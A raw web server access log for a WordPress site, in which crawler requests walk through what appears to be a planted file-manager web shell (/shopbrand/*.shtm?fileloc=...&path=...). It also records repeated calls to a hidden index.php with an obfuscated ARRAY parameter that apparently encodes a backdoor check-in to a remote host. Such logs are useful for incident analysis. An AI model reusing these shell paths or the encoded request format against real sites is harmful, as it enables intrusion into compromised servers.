20.171.207.35 - - [30/Oct/2025:06:41:39 +1000] "GET /shopbrand/543501171.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/password-strength-meter.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:41:43 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737333935332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737303335332q3735336432666563303835326436653432646464626264633064396431373238222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:06:41:43 +1000] "GET /shopbrand/543501171.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/customize-nav-menus.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 19365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:41:47 +1000] "GET /shopbrand/543501171.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:41:50 +1000] "GET /shopbrand/369031322.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:41:51 +1000] "GET /shopbrand/940050958.shtm HTTP/1.1" 200 26587 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:41:53 +1000] "GET /shopbrand/300595185.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:41:56 +1000] "GET /shopbrand/300996702.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/widgets HTTP/2.0" 200 4379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:00 +1000] "GET /shopbrand/369031322.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/se.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.129 - - [30/Oct/2025:06:42:04 +1000] "GET /shopbrand/447518272.shtm HTTP/1.1" 200 24845 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:05 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/code-editor.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 4636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:08 +1000] "GET /shopbrand/300595185.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/se.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:11 +1000] "GET /shopbrand/369031322.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:14 +1000] "GET /shopbrand/543501171.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:42:16 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737333938362p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737303338362q3134663438336139613939376366336532393263306332323462343139356234222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.129 - - [30/Oct/2025:06:42:18 +1000] "GET /shopbrand/447511607.shtm HTTP/1.1" 200 26314 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:18 +1000] "GET /shopbrand/300996702.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:21 +1000] "GET /shopbrand/300595185.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 10092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:42:24 +1000] "GET /shopbrand/940057901.shtm HTTP/1.1" 200 24982 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:25 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js/user-suggest.min.js&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/js HTTP/2.0" 200 3529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:28 +1000] "GET /shopbrand/369031322.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:42:28 +1000] "GET / HTTP/1.1" 200 4140 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
20.171.207.35 - - [30/Oct/2025:06:42:31 +1000] "GET /shopbrand/543501171.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:34 +1000] "GET /shopbrand/300996702.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:37 +1000] "GET /shopbrand/300595185.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors HTTP/2.0" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:42:37 +1000] "GET /shopbrand/447512834.shtm HTTP/1.1" 200 25689 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:40 +1000] "GET /shopbrand/664287765.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 10936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:42:43 +1000] "GET /shopbrand/940060599.shtm HTTP/1.1" 200 23917 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:46 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/list-tables-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 12654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:42:49 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737343031392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737303431392q6132663933663433356135316434346630623530303361656564313363653037222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:06:42:50 +1000] "GET /shopbrand/1660343814.shtm HTTP/1.1" 200 25892 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:51 +1000] "GET /shopbrand/369031322.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors/midnight HTTP/2.0" 200 3873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:42:54 +1000] "GET /shopbrand/300595185.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors/midnight HTTP/2.0" 200 3873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:42:57 +1000] "GET /shopbrand/447515710.shtm HTTP/1.1" 200 24021 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:42:58 +1000] "GET /shopbrand/543501171.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors/midnight HTTP/2.0" 200 3873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:02 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-edit.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 16482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:06 +1000] "GET /shopbrand/300996702.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/colors/midnight HTTP/2.0" 200 3873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:11 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/tesT5K9.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:43:12 +1000] "GET /shopbrand/447518954.shtm HTTP/1.1" 200 25361 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:16 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-new.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 11324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:43:17 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737343034372p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737303434372q3736653366623432643063306631663762313639333936386237393235323763222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:06:43:20 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/yRMeV7TjPUG.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 37820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:43:21 +1000] "GET /shopbrand/940053818.shtm HTTP/1.1" 200 27043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:24 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/privacy-policy-guide.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 4786 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:43:26 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?cd.html HTTP/1.1" 200 26685 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:06:43:26 +1000] "GET /shopbrand/447519777.shtm HTTP/1.1" 200 25798 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:27 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/UNZipeRiNQ.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 20559 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:31 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/update-core.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 17140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:34 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/options-privacy.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 6924 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:37 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/update.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 6409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:43:40 +1000] "GET /shopbrand/447511469.shtm HTTP/1.1" 200 30864 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:41 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/authorize-application.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 6781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:44 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/UWxzIVB7JRF.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 37821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:43:45 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737343037352p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737303437352q3535616530346634613838653439393636323166313735396137626266613465222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:06:43:45 +1000] "GET /shopbrand/45230833.shtm HTTP/1.1" 200 25298 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:48 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/upgrade-functions.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 3317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:43:50 +1000] "GET /shopbrand/447523037.shtm HTTP/1.1" 200 24320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:06:43:51 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/47451339.shtm HTTP/1.1" 200 26621 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:51 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/options-discussion.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 8235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:43:54 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/options-general.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 11150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:43:56 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-styles.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-includes HTTP/1.1" 200 25654 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:43:58 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/customize.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 7494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:44:01 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/options-permalink.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 10126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:44:01 +1000] "GET /shopbrand/449611547.shtm HTTP/1.1" 200 25137 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:44:04 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/widgets-form-blocks.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:44:07 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/options-reading.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 6787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:44:11 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/contribute.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:06:44:13 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737343130332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737303530332q3164396139386464353733386161656533643339386634313735376464383639222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:06:44:16 +1000] "GET /shopbrand/449606767.shtm HTTP/1.1" 200 25687 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:44:16 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/custom-background.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:44:19 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/erase-personal-data.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 6251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:06:44:22 +1000] "GET /shopbrand/447527108.shtm HTTP/1.1" 200 25171 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:06:44:23 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/options-writing.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 6706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:06:44:26 +1000] "GET /shopbrand/664287765.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/admin-functions.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 3375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
